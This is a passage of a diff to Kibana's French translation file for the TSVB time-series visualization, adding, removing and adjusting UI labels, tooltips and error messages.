"{firstFieldLabel} + {count} {count, plural, one {autre} other {autres}}", + "visTypeTimeseries.indexPattern.detailLevelHelpText": "Contrôle les intervalles auto et gte en fonction de la plage temporelle. Les paramètres avancés {histogramTargetBars} et {histogramMaxBars} ont un impact sur l'intervalle par défaut.", + "visTypeTimeseries.indexPattern.timeRange.error": "Vous ne pouvez pas utiliser \"{mode}\" avec le type d'index actuel.", + "visTypeTimeseries.indexPatternSelect.defaultDataViewText": "Utilisation de la vue de données par défaut. 
{queryAllIndicesHelpText}", + "visTypeTimeseries.indexPatternSelect.queryAllIndicesText": "Pour interroger tous les index, utilisez {asterisk}.", + "visTypeTimeseries.indexPatternSelect.switchModePopover.enableAllowStringIndices": "Pour interroger des index Elasticsearch, vous devez activer le paramètre {allowStringIndices}.", + "visTypeTimeseries.indexPatternSelect.switchModePopover.text": "Une vue de données regroupe et récupère les données à partir d'Elasticsearch. Désactivez ce mode pour interroger directement les index Elasticsearch. {allowStringIndicesLabel}", + "visTypeTimeseries.lastValueModeIndicator.lastBucketDate": "Compartiment : {lastBucketDate}", + "visTypeTimeseries.lastValueModeIndicator.panelInterval": "Intervalle : {formattedPanelInterval}", + "visTypeTimeseries.markdownEditor.howToAccessEntireTreeDescription": "Il existe également une variable spéciale nommée {all} que vous pouvez utiliser pour accéder à l'ensemble de l'arborescence. C'est utile pour créer des listes avec des données à l'aide d'une action Regrouper par :", + "visTypeTimeseries.markdownEditor.howToUseVariablesInMarkdownDescription": "Les variables suivantes peuvent être utilisées dans Markdown à l'aide de la syntaxe Handlebar (moustache). {handlebarLink} sur les expressions disponibles.", + "visTypeTimeseries.math.expressionDescription": "Ce champ utilise des expressions mathématiques de base (voir {link}). Les variables sont des clés sur l'objet {params}, c.-à-d. {paramsName}. Pour accéder à toutes les données, utilisez {paramsValues} pour un tableau de valeurs et {paramsTimestamps} pour un tableau d’horodatages. 
{paramsTimestamp} est disponible pour l'horodatage du compartiment actuel, {paramsIndex} est disponible pour l'index du compartiment actuel et {paramsInterval} est disponible pour l'intervalle en millisecondes.", + "visTypeTimeseries.metricMissingErrorMessage": "Indicateur manquant {field}", + "visTypeTimeseries.missingPanelConfigDescription": "Configuration de panneau manquante pour \"{modelType}\"", + "visTypeTimeseries.positiveRate.helpText": "Cette agrégation ne doit être appliquée qu'à {link} ; il s'agit d'un raccourci pour appliquer Max., Dérivée et Positif uniquement à un champ.", + "visTypeTimeseries.replaceVars.errors.unknownVarDescription": "{badVar} est une variable inconnue.", + "visTypeTimeseries.seriesConfig.missingSeriesComponentDescription": "Composant de série manquant pour le type de panneau : {panelType}", + "visTypeTimeseries.seriesConfig.templateHelpText": "par ex. {templateExample}", + "visTypeTimeseries.seriesRequest.label": "Série : {id}", + "visTypeTimeseries.table.optionsTab.itemUrlHelpText": "Prend en charge les modèles de moustaches. {key} est défini sur le terme.", + "visTypeTimeseries.table.templateHelpText": "par ex. {templateExample}", + "visTypeTimeseries.tableRequest.label": "Tableau : {id}", + "visTypeTimeseries.timeSeries.templateHelpText": "par ex. {templateExample}", + "visTypeTimeseries.topN.optionsTab.itemUrlDescription": "Prend en charge les modèles de moustaches. {key} est défini sur le terme.", + "visTypeTimeseries.unsupportedSplit.splitIsUnsupportedDescription": "Diviser par {modelType} n'est pas pris en charge.", + "visTypeTimeseries.visEditorVisualization.dataViewMode.notificationMessage": "Bonne nouvelle ! Vous pouvez visualiser les données des vues de données Kibana (recommandé) ou des index Elasticsearch. 
{indexPatternModeLink}.", + "visTypeTimeseries.wrongAggregationErrorMessage": "l'agrégation {metricType} n’est pas compatible pour la configuration de panneau existante.", "visTypeTimeseries.addDeleteButtons.addButtonDefaultTooltip": "Ajouter", "visTypeTimeseries.addDeleteButtons.cloneButtonDefaultTooltip": "Cloner", "visTypeTimeseries.addDeleteButtons.deleteButtonDefaultTooltip": "Supprimer", 
@@ -6268,12 +5482,9 @@ "visTypeTimeseries.addDeleteButtons.temporarilyDisableTooltip": "Désactiver temporairement", "visTypeTimeseries.advancedSettings.allowCheckingForFailedShardsText": "Afficher un message d'avertissement pour les données partielles dans les graphiques TSVB si la requête réussit pour certaines partitions, mais échoue pour d'autres.", "visTypeTimeseries.advancedSettings.allowCheckingForFailedShardsTitle": "Afficher les échecs de partition de requête TSVB", - "visTypeTimeseries.advancedSettings.allowStringIndicesText": "Vous permet d'interroger les index Elasticsearch dans les visualisations TSVB.", "visTypeTimeseries.advancedSettings.allowStringIndicesTitle": "Autoriser les index de chaîne dans TSVB", - "visTypeTimeseries.advancedSettings.maxBucketsText": "A un impact sur la densité de l'histogramme TSVB. Doit être défini sur une valeur supérieure à \"histogram:maxBars\".", - "visTypeTimeseries.advancedSettings.maxBucketsTitle": "Limite de compartiments TSVB", - "visTypeTimeseries.agg.aggIsNotSupportedDescription": "L'agrégation {modelType} n'est plus prise en charge.", - "visTypeTimeseries.agg.aggIsUnsupportedForPanelConfigDescription": "l'agrégation {modelType} n’est pas compatible pour la configuration de panneau existante.", + "visTypeTimeseries.advancedSettings.maxBucketsText": "A un impact sur la densité de l'histogramme TSVB. Doit être défini sur une valeur supérieure à \"histogram:maxBars\".", + "visTypeTimeseries.advancedSettings.maxBucketsTitle": "Limite de compartiments TSVB", "visTypeTimeseries.aggRow.addMetricButtonTooltip": "Ajouter un indicateur", "visTypeTimeseries.aggRow.deleteMetricButtonTooltip": "Supprimer un indicateur", "visTypeTimeseries.aggSelect.aggGroups.metricAggLabel": "Agrégations d'indicateurs", 
@@ -6312,48 +5523,35 @@ "visTypeTimeseries.aggUtils.topHitLabel": "Meilleur résultat", "visTypeTimeseries.aggUtils.valueCountLabel": "Nombre de valeurs", "visTypeTimeseries.aggUtils.varianceLabel": "Variance", - "visTypeTimeseries.annotationRequest.label": "Annotation : {id}", "visTypeTimeseries.annotationsEditor.addDataSourceButtonLabel": "Ajouter une source de données", "visTypeTimeseries.annotationsEditor.dataSourcesLabel": "Sources de données", "visTypeTimeseries.annotationsEditor.fieldsLabel": "Champs (requis – chemins séparés par des virgules)", "visTypeTimeseries.annotationsEditor.howToCreateAnnotationDataSourceDescription": "Cliquez sur le bouton ci-dessous pour créer une source de données d'annotation.", "visTypeTimeseries.annotationsEditor.iconLabel": "Icône (requis)", - "visTypeTimeseries.annotationsEditor.ignoreGlobalFiltersLabel": "Ignorer les filtres globaux ?", - "visTypeTimeseries.annotationsEditor.ignorePanelFiltersLabel": "Ignorer les filtres de panneau ?", + "visTypeTimeseries.annotationsEditor.ignoreGlobalFiltersLabel": "Ignorer les filtres globaux ?", + "visTypeTimeseries.annotationsEditor.ignorePanelFiltersLabel": "Ignorer les filtres de panneau ?", "visTypeTimeseries.annotationsEditor.queryStringLabel": "Chaîne de requête", - "visTypeTimeseries.annotationsEditor.rowTemplateHelpText": "eg.{rowTemplateExample}", "visTypeTimeseries.annotationsEditor.rowTemplateLabel": "Modèle de ligne (requis)", "visTypeTimeseries.annotationsEditor.timeFieldLabel": "Champ temporel (requis)", - "visTypeTimeseries.axisLabelOptions.axisLabel": "par {unitValue} {unitString}", "visTypeTimeseries.calculateLabel.bucketScriptsLabel": "Script de compartiment", "visTypeTimeseries.calculateLabel.countLabel": "Décompte", "visTypeTimeseries.calculateLabel.filterRatioLabel": "Rapport de filtre", "visTypeTimeseries.calculateLabel.mathLabel": "Mathématique", - "visTypeTimeseries.calculateLabel.metricTypeOfMetricFieldRankLabel": "{metricTypeLabel} de {metricField}", - 
"visTypeTimeseries.calculateLabel.metricTypeOfTargetLabel": "{metricTypeLabel} de {targetLabel}", - "visTypeTimeseries.calculateLabel.metricTypeOfTargetWithAdditionalLabel": "{metricTypeLabel} de {targetLabel} ({additionalLabel})", - "visTypeTimeseries.calculateLabel.positiveRateLabel": "Taux de compteur de {field}", - "visTypeTimeseries.calculateLabel.seriesAggLabel": "Agrégation de séries ({metricFunction})", - "visTypeTimeseries.calculateLabel.staticValueLabel": "Valeur statique de {metricValue}", "visTypeTimeseries.calculateLabel.unknownLabel": "Inconnu", "visTypeTimeseries.calculation.aggregationLabel": "Agrégation", - "visTypeTimeseries.calculation.painlessScriptDescription": "Les variables sont des clés sur l'objet {params}, c.-à-d. {paramsName}. Pour accéder à l'intervalle de compartiment (en millisecondes), utilisez {paramsInterval}.", "visTypeTimeseries.calculation.painlessScriptLabel": "Script Painless", "visTypeTimeseries.calculation.variablesLabel": "Variables", "visTypeTimeseries.colorPicker.clearIconLabel": "Effacer", "visTypeTimeseries.colorPicker.notAccessibleAriaLabel": "Sélecteur de couleur, non accessible", - "visTypeTimeseries.colorPicker.notAccessibleWithValueAriaLabel": "Sélecteur de couleur ({value}), non accessible", "visTypeTimeseries.colorRules.adjustChartSizeAriaLabel": "Utilisez les flèches haut/bas pour ajuster la taille du graphique.", "visTypeTimeseries.colorRules.defaultPrimaryNameLabel": "arrière-plan", "visTypeTimeseries.colorRules.defaultSecondaryNameLabel": "texte", "visTypeTimeseries.colorRules.emptyLabel": "vide", - "visTypeTimeseries.colorRules.greaterThanLabel": "> supérieur à", - "visTypeTimeseries.colorRules.greaterThanOrEqualLabel": ">= supérieur ou égal à", + "visTypeTimeseries.colorRules.greaterThanLabel": "> supérieur à", + "visTypeTimeseries.colorRules.greaterThanOrEqualLabel": ">= supérieur ou égal à", "visTypeTimeseries.colorRules.ifMetricIsLabel": "si l'indicateur est", - 
"visTypeTimeseries.colorRules.lessThanLabel": "< inférieur à", - "visTypeTimeseries.colorRules.lessThanOrEqualLabel": "<= inférieur ou égal à", - "visTypeTimeseries.colorRules.setPrimaryColorLabel": "Définissez {primaryName} sur", - "visTypeTimeseries.colorRules.setSecondaryColorLabel": "et {secondaryName} sur", + "visTypeTimeseries.colorRules.lessThanLabel": "< inférieur à", + "visTypeTimeseries.colorRules.lessThanOrEqualLabel": "<= inférieur ou égal à", "visTypeTimeseries.colorRules.valueAriaLabel": "Valeur", "visTypeTimeseries.cumulativeSum.aggregationLabel": "Agrégation", "visTypeTimeseries.cumulativeSum.metricLabel": "Indicateur", @@ -6364,7 +5562,6 @@ "visTypeTimeseries.dataFormatPicker.defaultLabelDescription": "Applique une mise en forme commune", "visTypeTimeseries.dataFormatPicker.durationLabel": "Durée", "visTypeTimeseries.dataFormatPicker.formatPatternHelpText": "Documentation", - "visTypeTimeseries.dataFormatPicker.formatPatternLabel": "Modèle de format Numeral.js (par défaut : {defaultPattern})", "visTypeTimeseries.dataFormatPicker.fromLabel": "De", "visTypeTimeseries.dataFormatPicker.numberLabel": "Nombre", "visTypeTimeseries.dataFormatPicker.percentLabel": "Pour cent", @@ -6372,7 +5569,7 @@ "visTypeTimeseries.defaultDataFormatterLabel": "Formateur de données", "visTypeTimeseries.derivative.aggregationLabel": "Agrégation", "visTypeTimeseries.derivative.metricLabel": "Indicateur", - "visTypeTimeseries.derivative.unitsLabel": "Unités (1s, 1m, etc.)", + "visTypeTimeseries.derivative.unitsLabel": "Unités (1s, 1m, etc.)", "visTypeTimeseries.durationOptions.daysLabel": "Jours", "visTypeTimeseries.durationOptions.hoursLabel": "Heures", "visTypeTimeseries.durationOptions.humanize": "Lisible par l'utilisateur", 
@@ -6387,25 +5584,20 @@
 "visTypeTimeseries.durationOptions.yearsLabel": "Années",
 "visTypeTimeseries.emptyTextValue": "(vide)",
 "visTypeTimeseries.error.requestForPanelFailedErrorMessage": "La requête pour ce panneau a échoué.",
- "visTypeTimeseries.errors.dataViewNotFoundError": "Impossible de trouver la vue de données : {dataViewId}",
- "visTypeTimeseries.errors.fieldNotFound": "Champ \"{field}\" introuvable",
 "visTypeTimeseries.errors.maxBucketsExceededErrorMessage": "Votre recherche a essayé de récupérer trop de données. Réduisez la plage de temps ou modifiez l'intervalle utilisé. Cela permet généralement de résoudre le problème.",
 "visTypeTimeseries.errors.timeFieldNotSpecifiedError": "Le champ temporel est obligatoire pour visualiser les données",
- "visTypeTimeseries.externalUrlErrorModal.bodyMessage": "Configurez {externalUrlPolicy} dans votre {kibanaConfigFileName} pour autoriser l'accès à {url}.",
 "visTypeTimeseries.externalUrlErrorModal.closeButtonLabel": "Fermer",
 "visTypeTimeseries.externalUrlErrorModal.headerTitle": "l'accès à cette URL externe n’est pas encore activé",
 "visTypeTimeseries.fetchFields.loadIndexPatternFieldsErrorMessage": "Impossible de charger les champs index_pattern",
 "visTypeTimeseries.fieldSelect.dragAriaLabel": "Faire glisser le champ",
- "visTypeTimeseries.fieldSelect.fieldIsNotValid": "La sélection \"{fieldParameter}\" n'est pas valide pour une utilisation avec l'index actuel.",
 "visTypeTimeseries.fieldSelect.selectFieldPlaceholder": "Sélectionner un champ…",
- "visTypeTimeseries.fieldUtils.multiFieldLabel": "{firstFieldLabel} + {count} {count, plural, one {autre} other {autres}}",
 "visTypeTimeseries.filterCannotBeAppliedError": "Le \"filter\" ne peut pas être appliqué avec cette configuration",
 "visTypeTimeseries.filterRatio.aggregationLabel": "Agrégation",
 "visTypeTimeseries.filterRatio.denominatorLabel": "Dénominateur",
 "visTypeTimeseries.filterRatio.fieldLabel": "Champ",
"visTypeTimeseries.filterRatio.metricAggregationLabel": "Agrégation d'indicateurs", "visTypeTimeseries.filterRatio.numeratorLabel": "Numérateur", - "visTypeTimeseries.function.help": "Visualisation TSVB", + "visTypeTimeseries.function.help": "Visualisation TSVB", "visTypeTimeseries.gauge.dataTab.dataButtonLabel": "Données", "visTypeTimeseries.gauge.dataTab.metricsButtonLabel": "Indicateurs", "visTypeTimeseries.gauge.editor.addSeriesTooltip": "Ajouter une série", @@ -6413,14 +5605,14 @@ "visTypeTimeseries.gauge.editor.deleteSeriesTooltip": "Supprimer la série", "visTypeTimeseries.gauge.editor.labelPlaceholder": "Étiquette", "visTypeTimeseries.gauge.editor.toggleEditorAriaLabel": "Activer/Désactiver l'éditeur de séries", - "visTypeTimeseries.gauge.optionsTab.backgroundColorLabel": "Couleur d'arrière-plan :", + "visTypeTimeseries.gauge.optionsTab.backgroundColorLabel": "Couleur d'arrière-plan :", "visTypeTimeseries.gauge.optionsTab.colorRulesLabel": "Règles de couleur", "visTypeTimeseries.gauge.optionsTab.dataLabel": "Données", "visTypeTimeseries.gauge.optionsTab.gaugeLineWidthLabel": "Largeur de la ligne de jauge", "visTypeTimeseries.gauge.optionsTab.gaugeMaxLabel": "Jauge max. (vide pour auto)", "visTypeTimeseries.gauge.optionsTab.gaugeStyleLabel": "Style de jauge", - "visTypeTimeseries.gauge.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", - "visTypeTimeseries.gauge.optionsTab.innerColorLabel": "Couleur intérieure :", + "visTypeTimeseries.gauge.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", + "visTypeTimeseries.gauge.optionsTab.innerColorLabel": "Couleur intérieure :", "visTypeTimeseries.gauge.optionsTab.innerLineWidthLabel": "Largeur de la ligne intérieure", "visTypeTimeseries.gauge.optionsTab.optionsButtonLabel": "Options", "visTypeTimeseries.gauge.optionsTab.panelFilterLabel": "Filtre de panneau", 
@@ -6453,35 +5645,28 @@ "visTypeTimeseries.iconSelect.tagLabel": "Balise", "visTypeTimeseries.indexPattern.detailLevel": "Niveau de détail", "visTypeTimeseries.indexPattern.detailLevelAriaLabel": "Niveau de détail", - "visTypeTimeseries.indexPattern.detailLevelHelpText": "Contrôle les intervalles auto et gte en fonction de la plage temporelle. Les paramètres avancés {histogramTargetBars} et {histogramMaxBars} ont un impact sur l'intervalle par défaut.", - "visTypeTimeseries.indexPattern.dropLastBucketLabel": "Abandonner le dernier compartiment ?", + "visTypeTimeseries.indexPattern.dropLastBucketLabel": "Abandonner le dernier compartiment ?", "visTypeTimeseries.indexPattern.finest": "Plus fin", - "visTypeTimeseries.indexPattern.intervalHelpText": "Exemples : auto, 1m, 1d, 7d, 1y, >=1m", + "visTypeTimeseries.indexPattern.intervalHelpText": "Exemples : auto, 1m, 1d, 7d, 1y, >=1m", "visTypeTimeseries.indexPattern.intervalLabel": "Intervalle", "visTypeTimeseries.indexPattern.timeFieldLabel": "Champ temporel", "visTypeTimeseries.indexPattern.timeRange.entireTimeRange": "Toute la plage temporelle", - "visTypeTimeseries.indexPattern.timeRange.error": "Vous ne pouvez pas utiliser \"{mode}\" avec le type d'index actuel.", "visTypeTimeseries.indexPattern.timeRange.hint": "Ce paramètre contrôle la période utilisée pour la mise en correspondance des documents. L'option \"Toute la plage temporelle\" mettra en correspondance tous les documents sélectionnés dans le sélecteur d'heure. 
L'option \"Dernière valeur\" ne mettra en correspondance que les documents pour l'intervalle spécifié à partir de la fin de la plage temporelle.", "visTypeTimeseries.indexPattern.timeRange.label": "Mode de plage temporelle des données", "visTypeTimeseries.indexPattern.timeRange.lastValue": "Dernière valeur", "visTypeTimeseries.indexPattern.timeRange.selectTimeRange": "Sélectionner", "visTypeTimeseries.indexPattern.сoarse": "Grossier", "visTypeTimeseries.indexPatternSelect.createDataViewText": "Créer une vue de données", - "visTypeTimeseries.indexPatternSelect.defaultDataViewText": "Utilisation de la vue de données par défaut. {queryAllIndicesHelpText}", "visTypeTimeseries.indexPatternSelect.label": "Vue de données", - "visTypeTimeseries.indexPatternSelect.queryAllIndicesText": "Pour interroger tous les index, utilisez {asterisk}.", + "visTypeTimeseries.indexPatternSelect.noDataView": "Vue de données introuvable", "visTypeTimeseries.indexPatternSelect.switchModePopover.allowStringIndices": "Autoriser les index de chaîne dans TSVB", "visTypeTimeseries.indexPatternSelect.switchModePopover.areaLabel": "Configurer le mode de sélection de la vue de données", - "visTypeTimeseries.indexPatternSelect.switchModePopover.enableAllowStringIndices": "Pour interroger des index Elasticsearch, vous devez activer le paramètre {allowStringIndices}.", - "visTypeTimeseries.indexPatternSelect.switchModePopover.text": "Une vue de données regroupe et récupère les données à partir d'Elasticsearch. Désactivez ce mode pour interroger directement les index Elasticsearch. 
{allowStringIndicesLabel}", "visTypeTimeseries.indexPatternSelect.switchModePopover.title": "Mode de vue de données", "visTypeTimeseries.indexPatternSelect.switchModePopover.useKibanaIndices": "Utiliser des vues de données Kibana", "visTypeTimeseries.kbnVisTypes.metricsDescription": "Réalisez des analyses avancées de vos données temporelles.", "visTypeTimeseries.kbnVisTypes.metricsTitle": "TSVB", - "visTypeTimeseries.lastValueModeIndicator.lastBucketDate": "Compartiment : {lastBucketDate}", "visTypeTimeseries.lastValueModeIndicator.lastValue": "Dernière valeur", "visTypeTimeseries.lastValueModeIndicator.lastValueModeBadgeAriaLabel": "Afficher les détails de la dernière valeur", - "visTypeTimeseries.lastValueModeIndicator.panelInterval": "Intervalle : {formattedPanelInterval}", "visTypeTimeseries.lastValueModePopover.gearButton": "Modifier l'option d'affichage de l'indicateur Dernière valeur", "visTypeTimeseries.lastValueModePopover.switch": "Afficher l'étiquette lors de l'utilisation du mode Dernière valeur", "visTypeTimeseries.lastValueModePopover.title": "Options de Dernière valeur", 
@@ -6496,25 +5681,22 @@ "visTypeTimeseries.markdown.editor.labelPlaceholder": "Étiquette", "visTypeTimeseries.markdown.editor.toggleEditorAriaLabel": "Activer/Désactiver l'éditeur de séries", "visTypeTimeseries.markdown.editor.variableNamePlaceholder": "Nom de la variable", - "visTypeTimeseries.markdown.optionsTab.backgroundColorLabel": "Couleur d'arrière-plan :", + "visTypeTimeseries.markdown.optionsTab.backgroundColorLabel": "Couleur d'arrière-plan :", "visTypeTimeseries.markdown.optionsTab.customCSSLabel": "CSS personnalisée", "visTypeTimeseries.markdown.optionsTab.dataLabel": "Données", - "visTypeTimeseries.markdown.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", - "visTypeTimeseries.markdown.optionsTab.openLinksInNewTab": "Ouvrir les liens dans un nouvel onglet ?", + "visTypeTimeseries.markdown.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", + "visTypeTimeseries.markdown.optionsTab.openLinksInNewTab": "Ouvrir les liens dans un nouvel onglet ?", "visTypeTimeseries.markdown.optionsTab.optionsButtonLabel": "Options", "visTypeTimeseries.markdown.optionsTab.panelFilterLabel": "Filtre de panneau", "visTypeTimeseries.markdown.optionsTab.panelOptionsButtonLabel": "Options du panneau", - "visTypeTimeseries.markdown.optionsTab.showScrollbarsLabel": "Afficher les barres de défilement ?", + "visTypeTimeseries.markdown.optionsTab.showScrollbarsLabel": "Afficher les barres de défilement ?", "visTypeTimeseries.markdown.optionsTab.styleLabel": "Style", - "visTypeTimeseries.markdown.optionsTab.verticalAlignmentLabel": "Alignement vertical :", - "visTypeTimeseries.markdownEditor.howToAccessEntireTreeDescription": "Il existe également une variable spéciale nommée {all} que vous pouvez utiliser pour accéder à l'ensemble de l'arborescence. 
C'est utile pour créer des listes avec des données à l'aide d'une action Regrouper par :", - "visTypeTimeseries.markdownEditor.howToUseVariablesInMarkdownDescription": "Les variables suivantes peuvent être utilisées dans Markdown à l'aide de la syntaxe Handlebar (moustache). {handlebarLink} sur les expressions disponibles.", + "visTypeTimeseries.markdown.optionsTab.verticalAlignmentLabel": "Alignement vertical :", "visTypeTimeseries.markdownEditor.howUseVariablesInMarkdownDescription.documentationLinkText": "Cliquer ici pour la documentation", "visTypeTimeseries.markdownEditor.nameLabel": "Nom", "visTypeTimeseries.markdownEditor.noVariablesAvailableDescription": "Aucune variable disponible pour les indicateurs de données sélectionnés.", "visTypeTimeseries.markdownEditor.valueLabel": "Valeur", "visTypeTimeseries.math.aggregationLabel": "Agrégation", - "visTypeTimeseries.math.expressionDescription": "Ce champ utilise des expressions mathématiques de base (voir {link}). Les variables sont des clés sur l'objet {params}, c.-à-d. {paramsName}. Pour accéder à toutes les données, utilisez {paramsValues} pour un tableau de valeurs et {paramsTimestamps} pour un tableau d’horodatages. {paramsTimestamp} est disponible pour l'horodatage du compartiment actuel, {paramsIndex} est disponible pour l'index du compartiment actuel et {paramsInterval} est disponible pour l'intervalle en millisecondes.", "visTypeTimeseries.math.expressionDescription.tinyMathLinkText": "TinyMath", "visTypeTimeseries.math.expressionLabel": "Expression", "visTypeTimeseries.math.variablesLabel": "Variables", 
@@ -6527,13 +5709,11 @@ "visTypeTimeseries.metric.editor.toggleEditorAriaLabel": "Activer/Désactiver l'éditeur de séries", "visTypeTimeseries.metric.optionsTab.colorRulesLabel": "Règles de couleur", "visTypeTimeseries.metric.optionsTab.dataLabel": "Données", - "visTypeTimeseries.metric.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", + "visTypeTimeseries.metric.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", "visTypeTimeseries.metric.optionsTab.optionsButtonLabel": "Options", "visTypeTimeseries.metric.optionsTab.panelFilterLabel": "Filtre de panneau", - "visTypeTimeseries.metric.optionsTab.panelOptionsButtonLabel": "Options du panneau", - "visTypeTimeseries.metricMissingErrorMessage": "Indicateur manquant {field}", + "visTypeTimeseries.metric.optionsTab.panelOptionsButtonLabel": "Options de panneau", "visTypeTimeseries.metricSelect.selectMetricPlaceholder": "Sélectionner l'indicateur…", - "visTypeTimeseries.missingPanelConfigDescription": "Configuration de panneau manquante pour \"{modelType}\"", "visTypeTimeseries.movingAverage.aggregationLabel": "Agrégation", "visTypeTimeseries.movingAverage.alpha": "Alpha", "visTypeTimeseries.movingAverage.beta": "Bêta", 
@@ -6556,30 +5736,28 @@ "visTypeTimeseries.noButtonLabel": "Non", "visTypeTimeseries.percentile.aggregationLabel": "Agrégation", "visTypeTimeseries.percentile.fieldLabel": "Champ", - "visTypeTimeseries.percentile.fillToLabel": "Remplir à :", - "visTypeTimeseries.percentile.modeLabel": "Mode :", + "visTypeTimeseries.percentile.fillToLabel": "Remplir à :", + "visTypeTimeseries.percentile.modeLabel": "Mode :", "visTypeTimeseries.percentile.modeOptions.bandLabel": "Bande", "visTypeTimeseries.percentile.modeOptions.lineLabel": "Ligne", "visTypeTimeseries.percentile.percentile": "Centile", "visTypeTimeseries.percentile.percentileAriaLabel": "Centile", "visTypeTimeseries.percentile.percents": "Pour cent", - "visTypeTimeseries.percentile.shadeLabel": "Ombre (0 à 1) :", - "visTypeTimeseries.percentileHdr.numberOfSignificantValueDigits": "Nombre de chiffres à valeur significative (histogramme HDR)", - "visTypeTimeseries.percentileHdr.numberOfSignificantValueDigits.hint": "L'histogramme HDR (High Dynamic Range, grande plage dynamique) est une autre implémentation qui peut être utile lors du calcul des rangs centiles pour les mesures de la latence, car elle peut être plus rapide que l'implémentation t-digest, bien qu'elle présente une empreinte mémoire plus élevée. Le paramètre \"Nombre de chiffres à valeur significative\" spécifie le nombre de chiffres significatifs pour la résolution des valeurs de l'histogramme.", + "visTypeTimeseries.percentile.shadeLabel": "Ombre (0 à 1) :", + "visTypeTimeseries.percentileHdr.numberOfSignificantValueDigits": "Nombre de chiffres à valeur significative (histogramme HDR)", + "visTypeTimeseries.percentileHdr.numberOfSignificantValueDigits.hint": "L'histogramme HDR (High Dynamic Range, grande plage dynamique) est une autre implémentation qui peut être utile lors du calcul des rangs centiles pour les mesures de la latence, car elle peut être plus rapide que l'implémentation t-digest, bien qu'elle présente une empreinte mémoire plus élevée. 
Le paramètre \"Nombre de chiffres à valeur significative\" spécifie le nombre de chiffres significatifs pour la résolution des valeurs de l'histogramme.", "visTypeTimeseries.percentileRank.aggregationLabel": "Agrégation", "visTypeTimeseries.percentileRank.fieldLabel": "Champ", "visTypeTimeseries.percentileRank.values": "Valeurs", "visTypeTimeseries.positiveOnly.aggregationLabel": "Agrégation", "visTypeTimeseries.positiveOnly.metricLabel": "Indicateur", "visTypeTimeseries.positiveRate.aggregationLabel": "Agrégation", - "visTypeTimeseries.positiveRate.helpText": "Cette agrégation ne doit être appliquée qu'à {link} ; il s'agit d'un raccourci pour appliquer Max., Dérivée et Positif uniquement à un champ.", "visTypeTimeseries.positiveRate.helpTextLink": "nombres augmentant de manière monolithique", "visTypeTimeseries.positiveRate.unitSelectPlaceholder": "Sélectionner le scaling…", "visTypeTimeseries.positiveRate.unitsLabel": "Scaling", "visTypeTimeseries.postiveRate.fieldLabel": "Champ", "visTypeTimeseries.replaceVars.errors.markdownErrorDescription": "Veuillez vérifier que vous utilisez uniquement Markdown, des variables connues et des expressions Handlebar intégrées.", "visTypeTimeseries.replaceVars.errors.markdownErrorTitle": "Erreur lors du traitement de votre Markdown", - "visTypeTimeseries.replaceVars.errors.unknownVarDescription": "{badVar} est une variable inconnue.", "visTypeTimeseries.replaceVars.errors.unknownVarTitle": "Erreur lors du traitement de votre Markdown", "visTypeTimeseries.searchStrategyUndefinedErrorMessage": "La stratégie de recherche n'était pas définie.", "visTypeTimeseries.serialDiff.aggregationLabel": "Agrégation", 
@@ -6603,13 +5781,10 @@ "visTypeTimeseries.seriesAgg.seriesAggIsNotCompatibleLabel": "L'agrégation de séries n'est pas compatible avec la visualisation de tableau.", "visTypeTimeseries.seriesConfig.filterLabel": "Filtre", "visTypeTimeseries.seriesConfig.ignoreGlobalFilterDisabledTooltip": "Cette option est désactivée, car les filtres globaux sont ignorés dans les options du panneau.", - "visTypeTimeseries.seriesConfig.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", - "visTypeTimeseries.seriesConfig.missingSeriesComponentDescription": "Composant de série manquant pour le type de panneau : {panelType}", + "visTypeTimeseries.seriesConfig.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", "visTypeTimeseries.seriesConfig.offsetSeriesTimeLabel": "Décaler l'heure de la série de (1m, 1h, 1w, 1d)", - "visTypeTimeseries.seriesConfig.overrideDataViewLabel": "Écraser la vue de données ?", - "visTypeTimeseries.seriesConfig.templateHelpText": "par ex. {templateExample}", + "visTypeTimeseries.seriesConfig.overrideDataViewLabel": "Écraser la vue de données ?", "visTypeTimeseries.seriesConfig.templateLabel": "Modèle", - "visTypeTimeseries.seriesRequest.label": "Série : {id}", "visTypeTimeseries.sort.dragToSortAriaLabel": "Faire glisser pour trier", "visTypeTimeseries.sort.dragToSortTooltip": "Faire glisser pour trier", "visTypeTimeseries.splits.everything.groupByLabel": "Regrouper par", 
@@ -6675,8 +5850,7 @@ "visTypeTimeseries.table.minLabel": "Min", "visTypeTimeseries.table.noResultsAvailableWithDescriptionMessage": "Aucun résultat disponible. Vous devez choisir un champ Regrouper par pour cette visualisation.", "visTypeTimeseries.table.optionsTab.dataLabel": "Données", - "visTypeTimeseries.table.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", - "visTypeTimeseries.table.optionsTab.itemUrlHelpText": "Prend en charge les modèles de moustaches. {key} est défini sur le terme.", + "visTypeTimeseries.table.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", "visTypeTimeseries.table.optionsTab.itemUrlLabel": "URL de l'élément", "visTypeTimeseries.table.optionsTab.panelFilterLabel": "Filtre de panneau", "visTypeTimeseries.table.optionsTab.panelOptionsButtonLabel": "Options du panneau", @@ -6684,14 +5858,12 @@ "visTypeTimeseries.table.overallMaxLabel": "Max. général", "visTypeTimeseries.table.overallMinLabel": "Min. général", "visTypeTimeseries.table.overallSumLabel": "Somme générale", - "visTypeTimeseries.table.showTrendArrowsLabel": "Afficher les flèches de tendance ?", + "visTypeTimeseries.table.showTrendArrowsLabel": "Afficher les flèches de tendance ?", "visTypeTimeseries.table.sumLabel": "Somme", "visTypeTimeseries.table.tab.metricsLabel": "Indicateurs", "visTypeTimeseries.table.tab.optionsLabel": "Options", - "visTypeTimeseries.table.templateHelpText": "par ex. {templateExample}", "visTypeTimeseries.table.templateLabel": "Modèle", - "visTypeTimeseries.table.toggleSeriesEditorAriaLabel": "Activer/Désactiver l'éditeur de séries", - "visTypeTimeseries.tableRequest.label": "Tableau : {id}", + "visTypeTimeseries.table.toggleSeriesEditorAriaLabel": "Basculer l'éditeur de séries", "visTypeTimeseries.timeSeries.addSeriesTooltip": "Ajouter une série", 